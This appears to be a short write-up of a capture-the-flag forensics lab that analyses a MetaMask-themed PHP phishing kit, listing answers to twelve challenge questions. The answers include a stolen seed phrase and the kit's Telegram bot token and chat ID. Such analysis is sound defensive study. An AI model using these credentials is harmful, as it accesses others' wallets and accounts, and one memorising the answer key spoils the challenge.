GrabThePhisher WriteUp

Ali Haydar Toprak
3 min readMay 1, 2023

--

1-) Which wallet is used for asking the seed phrase?

Investigate index , detect metamask folder

go to metamask directory and open the metamask.php

Bingoo = found wallet name

Answer => Metamask

2-)What is the file name that has the code for the phishing kit?

Answer => metamask.php

3-) In which language was the kit written?

Answer => php

4-) What service does the kit use to retrieve the victim’s machine information?

Answer => Sypex Geo

5-) How many seed phrases were already collected?

geo — city — date

Answer => 3

6-) How many seed phrases were already collected?

Answer => father also recycle embody balance concert mechanic believe owner pair muffin hockey

7-) Which medium had been used for credential dumping?

Answer => telegram

8-) What is the token for the channel?

open metamask.php

Answer => 5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10

9-) What is the chat ID of the phisher’s channel?

open metamask.php

Answer => 5442785564

10-) What are the allies of the phish kit developer?

open metamask.php

Answer => j1j1b1s@m3r0

11-) What is the full name of the Phish Actor?

requests telegram channel

Answer => Marcus Aurelius

12-) What is the username of the Phish Actor?

requests telegram channel

Answer => pumpkinboii

--

--

No responses yet